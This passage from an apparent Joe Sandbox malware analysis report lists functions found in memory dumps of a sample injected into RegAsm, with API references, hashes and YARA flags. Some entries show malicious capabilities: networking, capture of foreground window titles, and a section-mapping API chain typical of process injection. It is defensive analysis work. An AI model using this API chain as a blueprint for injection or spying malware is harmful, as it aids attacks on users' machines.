                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: String
                                                                                                                                                                                                  • String ID: LCMapStringEx
                                                                                                                                                                                                  • API String ID: 2568140703-3893581201
                                                                                                                                                                                                  • Opcode ID: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                                                                                                                                                                                  • Instruction ID: 984c2aabb43d86beb2eff1d34daabde68608d0bd8f0a2971fe4c3ea005c0c61c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9401D332500159BBEF129F90CC05EEE7F66EF08390F018115FE1826124CB369971AB95
                                                                                                                                                                                                  Function 10005D5C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Alloc
                                                                                                                                                                                                  • String ID: FlsAlloc
                                                                                                                                                                                                  • API String ID: 2773662609-671089009
                                                                                                                                                                                                  • Opcode ID: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                                                                                                                                                                                  • Instruction ID: c304bc83fd0672a576945d725d7c66755e55876121cef6cfa1c70df20931aaa1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 43E0E535600228ABF325EB608C15EEFBBA4DB583D1B01405AFE0966209CE326D0185D6
                                                                                                                                                                                                  Function 10003AF1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • try_get_function.LIBVCRUNTIME ref: 10003B06
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: try_get_function
                                                                                                                                                                                                  • String ID: FlsAlloc
                                                                                                                                                                                                  • API String ID: 2742660187-671089009
                                                                                                                                                                                                  • Opcode ID: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                                                                                                                                                                                                  • Instruction ID: 0b7c7f44018c04906f4f2ef9afae3f4f684564eee465a9a4c05fe82f6616737e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13D02B32744138B3F201B3A06C04BEEBB88D7025F2F040063FB4C5210CDB11591042E6
                                                                                                                                                                                                  Function 00438E14 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • try_get_function.LIBVCRUNTIME ref: 00438E29
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: try_get_function
                                                                                                                                                                                                  • String ID: FlsAlloc
                                                                                                                                                                                                  • API String ID: 2742660187-671089009
                                                                                                                                                                                                  • Opcode ID: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                                                                                                                                                                                                  • Instruction ID: b64d3ab94c56a33c1928a034b10f94234fe941941be7f39555266fb58f36a209
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09D02B31BC1328B6C51032955C03BD9B6048B00FF7F002067FF0C61283899E592082DE
                                                                                                                                                                                                  Function 0041B847 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B85B
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: GlobalMemoryStatus
                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                  • API String ID: 1890195054-2766056989
                                                                                                                                                                                                  • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                                                                                                                                                  • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                                                                                                                                                                                  Function 10006E20 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,10006CC1,?,00000000), ref: 10006E94
                                                                                                                                                                                                  • GetCPInfo.KERNEL32(00000000,10006CC1,?,?,?,10006CC1,?,00000000), ref: 10006EA7
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CodeInfoPageValid
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 546120528-0
                                                                                                                                                                                                  • Opcode ID: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                                                                                                                                                                  • Instruction ID: 1dd91d3823b6bb4934ca9945ee4913e93bf289da146d72ec34fd0236562290e4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91513474E043469EFB21CF71DC916BBBBE6EF49280F20807EE48687156D735DA458B90
                                                                                                                                                                                                  Function 10006C5F Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 10005AF6: GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                                                                                                    • Part of subcall function 10005AF6: _free.LIBCMT ref: 10005B2D
                                                                                                                                                                                                    • Part of subcall function 10005AF6: SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                                                                                                    • Part of subcall function 10005AF6: _abort.LIBCMT ref: 10005B74
                                                                                                                                                                                                    • Part of subcall function 10006D7E: _abort.LIBCMT ref: 10006DB0
                                                                                                                                                                                                    • Part of subcall function 10006D7E: _free.LIBCMT ref: 10006DE4
                                                                                                                                                                                                    • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                                                                                                                                                  • _free.LIBCMT ref: 10006CD7
                                                                                                                                                                                                  • _free.LIBCMT ref: 10006D0D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$ErrorLast_abort
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2991157371-0
                                                                                                                                                                                                  • Opcode ID: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                                                                                                                                                                  • Instruction ID: 62e76a57c0cb8018fa5258269fd2d3c97d0f5aa08c1c35bbbea2ca126a332e06
                                                                                                                                                                                                  • Opcode Fuzzy Hash: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB31D835904249AFF700CB69DD81B5D77F6EF493A0F3141A9E8049B295EB76AD40CB50
                                                                                                                                                                                                  Function 0044EFD8 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                                                                    • Part of subcall function 0044F0F7: _abort.LIBCMT ref: 0044F129
                                                                                                                                                                                                    • Part of subcall function 0044F0F7: _free.LIBCMT ref: 0044F15D
                                                                                                                                                                                                    • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                                                                                                                                                                                  • _free.LIBCMT ref: 0044F050
                                                                                                                                                                                                  • _free.LIBCMT ref: 0044F086
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$ErrorLast_abort
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2991157371-0
                                                                                                                                                                                                  • Opcode ID: 5c488e73cd7317a59bb91e94e032dcb6bf067ffc0982221c2c2ef85a747d1bec
                                                                                                                                                                                                  • Instruction ID: a9f826519387c1ac895116d2974c89b4af6d1f604a138ae73dd4863203302c4b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c488e73cd7317a59bb91e94e032dcb6bf067ffc0982221c2c2ef85a747d1bec
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D31D371900104AFEB10EB69D441B9A77F4EF81325F2540AFE5049B2A3DB7A5D44CB58
                                                                                                                                                                                                  Function 0040482D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 00404852
                                                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                                                                                                                                                                    • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CreateEventStartupsocket
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1953588214-0
                                                                                                                                                                                                  • Opcode ID: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                                                                                                                                                                  • Instruction ID: ed99eca956a2b7a9b5891d615cc725ddac26720bb1770143763ad27df005c20f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 760171B1408B809ED7359F38A8456877FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                                                                                                                                                                                  Function 10001EEC Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • dllmain_crt_process_attach.LIBCMT ref: 10001F22
                                                                                                                                                                                                  • dllmain_crt_process_detach.LIBCMT ref: 10001F35
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: dllmain_crt_process_attachdllmain_crt_process_detach
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3750050125-0
                                                                                                                                                                                                  • Opcode ID: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                                                                                                                                                                  • Instruction ID: 876e10da87b92cf64c449b9c471687dd08192407587f6dd1e67cbf7e6a41b987
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A0E0D83646820BEAFB11EEB498156FD37D8EB011C1F100536B851C115ECB39EB90F121
                                                                                                                                                                                                  Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                                                                                                                                                                                                  • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D
                                                                                                                                                                                                  Function 0041BB27 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 0041BB49
                                                                                                                                                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BB5C
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Window$ForegroundText
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 29597999-0
                                                                                                                                                                                                  • Opcode ID: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                                                                                                                                                                  • Instruction ID: 8c7c0eb369f00208a7459315ff6bb8442305c4ed6b2016914032ba092e23deac
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 21E04875A00328A7E720A7A5AC4EFD5776C9708755F0001AEBA1CD61C2EDB4AD448BE5
                                                                                                                                                                                                  Function 00414F24 Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,004151C3,00000000,00000001), ref: 00414F46
                                                                                                                                                                                                  • WSASetLastError.WS2_32(00000000), ref: 00414F4B
                                                                                                                                                                                                    • Part of subcall function 00414DC1: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                                                                                                                                                                    • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                                                                                                                                                                    • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                                                                                                                                                                    • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                                                                                                                                                                    • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                                                                                                                                                                    • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                                                                                                                                                                    • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                                                                                                                                                                    • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1170566393-0
                                                                                                                                                                                                  • Opcode ID: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                                                                                                                                                                                                  • Instruction ID: 64a5677b7ab27dcaa32d5743096e05a6e92bfc5102e3e8065abb212a99eff034
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23D017322005316BD320A769AC00AEBAA9EDFD6760B12003BBD08D2251DA949C8286E8
                                                                                                                                                                                                  Function 100038E8 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 10003AF1: try_get_function.LIBVCRUNTIME ref: 10003B06
                                                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003906
                                                                                                                                                                                                  • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 10003911
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 806969131-0
                                                                                                                                                                                                  • Opcode ID: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                                                                                                                                                                  • Instruction ID: 7b09b9f0a56a55c342e0a0cde292dff0536b901afa775ab746cb2a45ce2dbbc5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50D0223A8087431CF80BC6BD2C67A8B23CCCB421F4360C2A6F7209A0CDEF60E0046322
                                                                                                                                                                                                  Function 0043A46C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00438E14: try_get_function.LIBVCRUNTIME ref: 00438E29
                                                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A48A
                                                                                                                                                                                                  • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A495
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 806969131-0
                                                                                                                                                                                                  • Opcode ID: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                                                                                                                                                                                                  • Instruction ID: eb5cae5cbee30b1ad319c652a9e61f9a188d1dba44d7e0681113cf8ff6ee03f7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34D0A725584340141C04A279381B19A1348193A778F70725FF5A0C51D2EEDD4070512F
                                                                                                                                                                                                  Function 004185A3 Relevance: 2.5, APIs: 2, Instructions: 18COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                                                                                                                                                                    • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                                                                                                                                                                    • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                                                                                                                                                                    • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                                                                                                                                                                    • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                                                                                                                                                                    • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                                                                                                                                                                    • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                                                                                                                                                                    • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                                                                                                                                                                    • Part of subcall function 0041812A: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                                                                                                                                                                    • Part of subcall function 0041812A: VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                                                                                                                                                                  • CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                                                                                                                                                                  Memory Dump Source
